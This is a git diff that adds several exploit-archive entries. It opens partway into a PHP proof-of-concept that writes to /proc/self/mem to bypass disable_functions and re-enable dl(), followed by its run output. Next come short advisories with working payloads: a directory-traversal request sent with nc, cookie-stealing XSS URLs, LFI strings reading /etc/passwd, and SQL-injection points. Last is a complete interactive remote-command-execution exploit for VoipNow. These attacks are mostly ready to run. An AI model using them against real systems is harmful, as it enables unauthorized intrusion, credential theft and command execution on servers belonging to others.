+00e94000-00ea1000 rw-p 00894000 08:01 4997702                            /usr/bin/php5
+00ea1000-00ebe000 rw-p 00000000 00:00 0 
+0278f000-02a65000 rw-p 00000000 00:00 0                                  [heap]
+
+*/
+//set the extension_dir
+fseek($mem, 0x00ea1000);
+for($i = 0;$i <  0x00ebe000 - 0x00ea1000;$i += 4)
+{
+	//echo 'x';
+	$num = unp(fread($mem, 4));
+	if($num == 0x66778899)
+	{
+		$offset = 0x00ea1000 + $i;
+		printf("got noe, offset is:0x%x\r\n", $offset);
+		printf("Now set error_reporting to 0x55667788 and reread the value\r\n");
+		error_reporting(0x55667788);
+		fseek($mem, $offset);
+		$num = unp(fread($mem, 4));
+		printf("The value is %x\r\n", $num);
+		if($num == 0x55667788)
+		{
+			printf("I found the offset of executor_globals's member error_reporting\r\n");
+
+			printf("read the structure\r\n");
+			fseek($mem, $offset);
+			fseek($mem, $offset + 392 - 8); //seek to int timeout_seconds member
+			$timeout = dump_value($mem, 4);
+			if($timeout == 0x41424344)
+			{
+				error_reporting(E_ALL); //restore the error reporting
+				printf("I found the timeout_seconds I seted:0x%08x\r\n", $timeout);
+				dump_value($mem, 4);
+				$ini_dir = dump_value($mem, 8);
+				printf("ini_directives address maybe in 0x%016x\r\n", $ini_dir);
+				fseek($mem, $ini_dir + 48); //seek to Bucket **arBuckets;
+				$arBucket = dump_value($mem, 8);
+				printf("Bucket **arBuckets address maybe in 0x%016x\r\n", $arBucket);
+				fseek($mem, $arBucket);
+				//try to get the first Bucket address
+				for($i = 0;$i < 1000;$i ++)
+				{
+					$bucket = dump_value($mem, 8);
+					//printf("This bucket address maybe in 0x%016x\r\n", $bucket);
+					fseek($mem, $bucket + 16); //seek to const void *pData; in struct Bucket
+					$pdata = dump_value($mem, 8);
+					dump_value($mem, 8);
+					//printf("This pData address maybe in 0x%016x\r\n", $pdata);
+
+					fseek($mem, $pdata + 8); //seek to char* name;
+					$name = dump_value($mem, 8);
+					$name_t = dump_value($mem, 4);
+					//printf("This char name* address maybe in 0x%016x, length:%d\r\n", $name, $name_t);
+					fseek($mem, $name);
+					$strname = fread($mem, $name_t);
+					if(strlen($strname) == 0) break;
+					//printf("ini key:%s\r\n", $strname);
+					if(strncmp($strname, 'extension_dir', 13) == 0)
+					{
+						printf("I found the extension_dir offset!\r\n");
+						printf("try to set extension_dir value /tmp by ini_set\r\n");
+						ini_set('extension_dir', '/tmp');
+						printf("try to get extension_dir value by ini_get\r\n");
+						var_dump(ini_get('extension_dir'));
+
+						// write string value
+						fseek($mem, $pdata + 56); //seek to char* value;
+						$value = dump_value($mem, 8);
+						$value_t = dump_value($mem, 4);
+						printf("This char value* address maybe in 0x%016x, length:%d\r\n", $value, $value_t);
+						
+						// write data part
+					
+						$mem_w = fopen("/proc/self/mem", "wb");
+						fseek($mem_w, $value);
+						fwrite($mem_w, "/tmp\0", 5); //write /tmp value
+						printf("retry to get extension_dir value!!!!\r\n");
+						var_dump(ini_get('extension_dir'));
+						
+						error_reporting(0x66778899);
+						break;
+					}
+					//seek to struct bucket *pListNext; ready to read next bucket's address
+					fseek($mem, $bucket + 32 + 8);//struct bucket *pListLast;  it's so strage!
+				}
+			}
+			
+		}
+		else
+		{
+			printf("now here, restore the value\r\n");
+			error_reporting(0x66778899);
+		}
+	}
+}
+
+
+//set the enable_dl
+fseek($mem, 0x00ea1000);
+for($i = 0;$i <  0x00ebe000 - 0x00ea1000;$i += 4)
+{
+	$num = unp(fread($mem, 4));
+	if($num == 0x66778899)
+	{
+		$offset = 0x00ea1000 + $i;
+		printf("got noe, offset is:0x%x\r\n", $offset);
+		printf("Now set error_reporting to 0x55667788 and reread the value\r\n");
+		error_reporting(0x55667788);
+		fseek($mem, $offset);
+		$num = unp(fread($mem, 4));
+		printf("The value is %x\r\n", $num);
+		if($num == 0x55667788)
+		{
+			printf("I found the offset of executor_globals's member error_reporting\r\n");
+
+			printf("read the structure\r\n");
+			fseek($mem, $offset);
+			fseek($mem, $offset + 392 - 8); //seek to int timeout_seconds member
+			$timeout = dump_value($mem, 4);
+			if($timeout == 0x41424344)
+			{
+				error_reporting(E_ALL); //restore the error reporting
+				printf("I found the timeout_seconds I seted:0x%08x\r\n", $timeout);
+				dump_value($mem, 4);
+				$ini_dir = dump_value($mem, 8);
+				printf("ini_directives address maybe in 0x%016x\r\n", $ini_dir);
+				fseek($mem, $ini_dir + 48); //seek to Bucket **arBuckets;
+				$arBucket = dump_value($mem, 8);
+				printf("Bucket **arBuckets address maybe in 0x%016x\r\n", $arBucket);
+				fseek($mem, $arBucket);
+				//try to get the first Bucket address
+				for($i = 0;$i < 1000;$i ++)
+				{
+					$bucket = dump_value($mem, 8);
+					//printf("This bucket address maybe in 0x%016x\r\n", $bucket);
+					fseek($mem, $bucket + 16); //seek to const void *pData; in struct Bucket
+					$pdata = dump_value($mem, 8);
+					dump_value($mem, 8);
+					//printf("This pData address maybe in 0x%016x\r\n", $pdata);
+
+					fseek($mem, $pdata + 8); //seek to char* name;
+					$name = dump_value($mem, 8);
+					$name_t = dump_value($mem, 4);
+					//printf("This char name* address maybe in 0x%016x, length:%d\r\n", $name, $name_t);
+					fseek($mem, $name);
+					$strname = fread($mem, $name_t);
+					if(strlen($strname) == 0) break;
+					//printf("ini key:%s\r\n", $strname);
+					if(strncmp($strname, 'enable_dl', 9) == 0)
+					{
+						printf("I found the enable_dl offset!\r\n");
+						printf("try to set enable_dl value true by ini_set\r\n");
+						ini_set('enable_dl', true);
+						printf("try to get enable_dl value by ini_get\r\n");
+						var_dump(ini_get('enable_dl'));
+
+						printf("try to run dl() function\r\n");
+						dl('not_exists');
+
+						printf("try to modifiy the modifiable member in memory!\r\n");
+						fseek($mem, $pdata + 4);
+						$modifiable = dump_value($mem, 4);
+						printf("org modifiable value is %x\r\n", $modifiable);
+						$mem_w = fopen("/proc/self/mem", "wb");
+						fseek($mem_w, $pdata + 4); //seek to modifiable
+						fwrite($mem_w, packli(7));
+					//check
+						fseek($mem, $pdata + 4);
+						$modifiable = dump_value($mem, 4);
+						printf("now modifiable value is %x\r\n", $modifiable);
+						printf("try ini_set enable_dl agen!!!!\r\n");
+						ini_set('enable_dl', true);
+						printf("now enable_dl seting is\r\n");
+						var_dump(ini_get('enable_dl'));
+						printf("retry the dl() function!!!!\r\n");
+						ini_set('extension_dir', '/tmp');
+						dl('not_exists');
+						
+						
+						exit(0);
+					}
+					//seek to struct bucket *pListNext; ready to read next bucket's address
+					fseek($mem, $bucket + 32 + 8);//struct bucket *pListLast;  it's so strage!
+				}
+			}
+			
+		}
+		else
+		{
+			printf("now here, restore the value\r\n");
+			error_reporting(0x66778899);
+		}
+	}
+}
+function unp($value) {
+    return hexdec(bin2hex(strrev($value)));
+}
+function dump_value($dh, $flag)
+{
+	switch($flag)
+	{
+		case 4: return unp(fread($dh, 4));
+		case 8: return unp(fread($dh, 8));
+	}
+}
+function packlli($value) {
+    $higher = ($value & 0xffffffff00000000) >> 32;
+    $lower = $value & 0x00000000ffffffff;
+    return pack('V2', $lower, $higher);
+}
+function packli($value) {
+    return pack('V', $value);
+}
+/*
+ylbhz@ylbhz-Aspire-5750G:/tmp$ php php_cgimode_fpm_writeprocmemfile_bypass_disablefunction_demo.php
+got noe, offset is:0xebd180
+Now set error_reporting to 0x55667788 and reread the value
+The value is 55667788
+I found the offset of executor_globals's member error_reporting
+read the structure
+I found the timeout_seconds I seted:0x41424344
+ini_directives address maybe in 0x00000000024983c0
+Bucket **arBuckets address maybe in 0x00000000026171e0
+I found the extension_dir offset!
+try to set extension_dir value /tmp by ini_set
+try to get extension_dir value by ini_get
+string(22) "/usr/lib/php5/20121212"
+This char value* address maybe in 0x0000000000b5ea53, length:22
+retry to get extension_dir value!!!!
+string(4) "/tmp"
+got noe, offset is:0xebd180
+Now set error_reporting to 0x55667788 and reread the value
+The value is 55667788
+I found the offset of executor_globals's member error_reporting
+read the structure
+I found the timeout_seconds I seted:0x41424344
+ini_directives address maybe in 0x00000000024983c0
+Bucket **arBuckets address maybe in 0x00000000026171e0
+I found the enable_dl offset!
+try to set enable_dl value true by ini_set
+try to get enable_dl value by ini_get
+string(0) ""
+try to run dl() function
+PHP Warning:  dl(): Dynamically loaded extensions aren't enabled in /tmp/php_cgimode_fpm_writeprocmemfile_bypass_disablefunction_demo.php on line 326
+try to modifiy the modifiable member in memory!
+org modifiable value is 4
+now modifiable value is 7
+try ini_set enable_dl agen!!!!
+now enable_dl seting is
+string(1) "1"
+retry the dl() function!!!!
+PHP Warning:  dl(): Unable to load dynamic library '/tmp/not_exists' - /tmp/not_exists: cannot open shared object file: No such file or directory in /tmp/php_cgimode_fpm_writeprocmemfile_bypass_disablefunction_demo.php on line 345
+ylbhz@ylbhz-Aspire-5750G:/tmp$ 
+
+
+ylbhz@ylbhz-Aspire-5750G:/tmp$ php -v
+PHP 5.5.9-1ubuntu4.9 (cli) (built: Apr 17 2015 11:44:57) 
+Copyright (c) 1997-2014 The PHP Group
+Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
+    with Zend OPcache v7.0.3, Copyright (c) 1999-2014, by Zend Technologies
+ylbhz@ylbhz-Aspire-5750G:/tmp$ uname -a
+Linux ylbhz-Aspire-5750G 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
+*/
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/38129.txt b/platforms/php/webapps/38129.txt
new file mode 100755
index 000000000..61beb2b40
--- /dev/null
+++ b/platforms/php/webapps/38129.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Octogate UTM Admin Interface Directory Traversal
+# Date: 26.08.2015
+# Software Link: http://www.octogate.com
+# Exploit Author: Oliver Karow
+# Contact: oliver.karow@gmx.de
+# Website: http://www.oliverkarow.de
+# Category: Remote Exploit
+
+
+Affected Products/Versions
+--------------------------
+
+Product Name: Octogate
+Version: 3.0.12 - Virtual Appliance & Appliance
+
+
+Product/Company Information
+---------------------------
+
+Octogate is a UTM Device, including the following features: Application
+Firewall, Intrusion Detection and -Prevention, Stateful- & Deep Packet
+Inspection, DoS- and DDoS protection and Reverse Proxy.
+
+Octogate IT Security Systems GmbH is based in Germany.
+
+
+Vulnerability Description
+-------------------------
+
+Octogate UTM Device is managed via web interface. The download function
+for SSL-Certifcate and Documentation is accessable without
+authentication, and allows access to files outside of the web root via
+the script /scripts/download.php.
+
+Example request:
+
+echo -en
+"GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl
+HTTP/1.0\r\nHost: 192.168.0.177\r\nReferer:
+http://192.168.0.177\r\nConnection: close\r\n\r\n" | nc 192.168.0.177 80
+
+Patch Information
+-----------------
+
+Patch is available from vendor.
+
+Advisory Information
+--------------------
+
+http://www.oliverkarow.de/research/octogate.txt
+
+
diff --git a/platforms/php/webapps/38131.txt b/platforms/php/webapps/38131.txt
new file mode 100755
index 000000000..3a9808acb
--- /dev/null
+++ b/platforms/php/webapps/38131.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/56937/info
+
+PHP Address Book is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PHP Address Book 8.1.24.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?group=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83
+%2C83%29%29%3C%2FSCRIPT%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/38133.txt b/platforms/php/webapps/38133.txt
new file mode 100755
index 000000000..01f27b65c
--- /dev/null
+++ b/platforms/php/webapps/38133.txt
@@ -0,0 +1,65 @@
+source: http://www.securityfocus.com/bid/56953/info
+
+The TimThumb plug-in for WordPress is prone to multiple security vulnerabilities, including:
+
+1. A cross-site scripting vulnerability
+2. Multiple security-bypass vulnerabilities
+3. An arbitrary file-upload vulnerability
+4. An information-disclosure vulnerability
+5. Multiple path-disclosure vulnerabilities
+6. A denial-of-service vulnerability
+
+Attackers can exploit these issues to bypass certain security restrictions, obtain sensitive information, perform certain administrative actions, gain unauthorized access, upload arbitrary files, compromise the application, access or modify data, cause denial-of-service conditions, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks may also be possible. 
+
+XSS (WASC-08) (in versions of Rokbox with older versions of TimThumb):
+
+http://www.example.complugins/wp_rokbox/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
+
+Full path disclosure (WASC-13):
+
+http://www.example.complugins/wp_rokbox/thumb.php?src=http://
+
+http://www.example.complugins/wp_rokbox/thumb.php?src=http://site/page.png&h=1&w=1111111
+
+http://www.example.complugins/wp_rokbox/thumb.php?src=http://site/page.png&h=1111111&w=1
+
+Abuse of Functionality (WASC-42):
+
+http://www.example.complugins/wp_rokbox/thumb.php?src=http://site&h=1&w=1
+http://www.example.complugins/wp_rokbox/thumb.php?src=http://site.flickr.com&h=1&w=1
+(bypass of restriction on domain, if such restriction is turned on)
+
+DoS (WASC-10):
+
+http://www.example.complugins/wp_rokbox/thumb.php?src=http://site/big_file&h=1&w=1
+http://www.example.complugins/wp_rokbox/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1
+(bypass of restriction on domain, if such restriction is turned on)
+
+Arbitrary File Upload (WASC-31):
+
+http://www.example.complugins/wp_rokbox/thumb.php?src=http://flickr.com.site.com/shell.php
+
+Content Spoofing (WASC-12):
+
+In parameter file there can be set as video, as audio files.
+
+http://www.example.complugins/wp_rokbox/thumb.php?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
+http://www.example.complugins/wp_rokbox/thumb.php?file=1.flv&image=1.jpg
+http://www.example.complugins/wp_rokbox/thumb.php?config=1.xml
+http://www.example.complugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site
+
+XSS (WASC-08):
+
+http://www.example.complugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
+
+Information Leakage (WASC-13):
+
+http://www.example.complugins/wp_rokbox/error_log
+
+Leakage of error log with full paths.
+
+Full path disclosure (WASC-13):
+
+http://www.example.complugins/wp_rokbox/rokbox.php
+
+
diff --git a/platforms/php/webapps/38134.txt b/platforms/php/webapps/38134.txt
new file mode 100755
index 000000000..106dac794
--- /dev/null
+++ b/platforms/php/webapps/38134.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56994/info
+
+ZT Autolinks Component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
+
+http://www.example.com/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00 
\ No newline at end of file
diff --git a/platforms/php/webapps/38135.txt b/platforms/php/webapps/38135.txt
new file mode 100755
index 000000000..6836cf5d3
--- /dev/null
+++ b/platforms/php/webapps/38135.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56995/info
+
+The Bit Component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
+
+http://www.example.com/index.php?option=com_bit&controller=../../../../../../../../../../../../../../../etc/passwd%00 
\ No newline at end of file
diff --git a/platforms/php/webapps/38139.txt b/platforms/php/webapps/38139.txt
new file mode 100755
index 000000000..7268f8781
--- /dev/null
+++ b/platforms/php/webapps/38139.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57009/info
+
+The Transactions Plugin for MyBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Transactions 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com//bank.php?transactions=[SQLi] 
\ No newline at end of file
diff --git a/platforms/php/webapps/38140.php b/platforms/php/webapps/38140.php
new file mode 100755
index 000000000..e6527a010
--- /dev/null
+++ b/platforms/php/webapps/38140.php
@@ -0,0 +1,76 @@
+source: http://www.securityfocus.com/bid/57032/info
+
+VoipNow Service Provider Edition is prone to a remote arbitrary command-execution vulnerability because it fails to properly validate user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application.
+
+Versions of VoipNow Service Provider Edition prior to 2.3 are vulnerable; other versions may also affected. 
+
+<?
+# Title: 4psa VoipNow < 2.3 , Remote Command Execution vuln
+# Software Link: http://www.4psa.com/products-4psavoipnow.html
+# Author: Faris , aka i-Hmx
+# Home : sec4ever.com , 1337s.cc
+# Mail : n0p1337@gmail.com
+# Tested on: VoipNow dist.
+/*
+VoipNow suffer from critical RCE vuln.
+Vulnerable File : plib/xajax_components.php
+Snip.
+if ( isset( $_GET['varname'] ) )
+{
+$func_name = $_GET['varname'];
+$func_arg = $_POST["fid-".$_GET['varname']];
+$func_params = $_GET;
+if ( function_exists( $func_name ) )
+{
+echo $func_name( $func_arg, $func_params );
+}
+else
+{
+echo "<ul><li>Function: ".$func_name." does not exist.</li></ul>";
+}
+}
+Demo Exploit :
+Get : plib/xajax_components.php?varname=system
+Post : fid-system=echo WTF!!
+so the result is
+echo system( 'echo WTF!!', array() );
+the system var need just the 1st parameter
+so don't give fu#* about the array :D
+Peace out
+*/
+echo "\n+-------------------------------------------+\n";
+echo "| VoipNow 2.5.3 |\n";
+echo "| Remote Command Execution Exploit |\n";
+echo "| By i-Hmx |\n";
+echo "| n0p1337@gmail.com |\n";
+echo "+-------------------------------------------+\n";
+echo "\n| Enter Target [https://ip] # ";
+$target=trim(fgets(STDIN));
+function faget($url,$post){
+$curl=curl_init();
+curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($curl,CURLOPT_URL,$url);
+curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
+curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
+curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
+curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($curl,CURLOPT_TIMEOUT,20);
+curl_setopt($curl, CURLOPT_HEADER, false);
+$exec=curl_exec($curl);
+curl_close($curl);
+return $exec;
+}
+while(1)
+{
+echo "\ni-Hmx@".str_replace("https://","",$target)."# ";
+$cmd=trim(fgets(STDIN));
+if($cmd=="exit"){exit();}
+$f_rez=faget($target."/plib/xajax_components.php?varname=system","fid-system=$cmd");
+echo $f_rez;
+}
+# NP : Just cleaning my pc from an old old trash , The best is yet to come ;)
+?>
diff --git a/platforms/php/webapps/38141.txt b/platforms/php/webapps/38141.txt
new file mode 100755
index 000000000..5a6f5e7e4
--- /dev/null
+++ b/platforms/php/webapps/38141.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57035/info
+
+Hero is prone to multiple cross-site scripting vulnerabilities and a cross-site request-forgery vulnerability.
+
+An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
+
+Hero 3.76 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d" 
\ No newline at end of file
diff --git a/platforms/php/webapps/38142.txt b/platforms/php/webapps/38142.txt
new file mode 100755
index 000000000..be7a3576c
--- /dev/null
+++ b/platforms/php/webapps/38142.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57035/info
+ 
+Hero is prone to multiple cross-site scripting vulnerabilities and a cross-site request-forgery vulnerability.
+ 
+An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
+ 
+Hero 3.76 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d" 
\ No newline at end of file
diff --git a/platforms/php/webapps/38143.txt b/platforms/php/webapps/38143.txt
new file mode 100755
index 000000000..328ac7156
--- /dev/null
+++ b/platforms/php/webapps/38143.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57045/info
+
+cPanel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/frontend/x3/mail/manage.html?account=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/38144.txt b/platforms/php/webapps/38144.txt
new file mode 100755
index 000000000..dc7e3e22a
--- /dev/null
+++ b/platforms/php/webapps/38144.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57049/info
+
+City Reviewer is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/city_reviewer/search.php?category=6 
\ No newline at end of file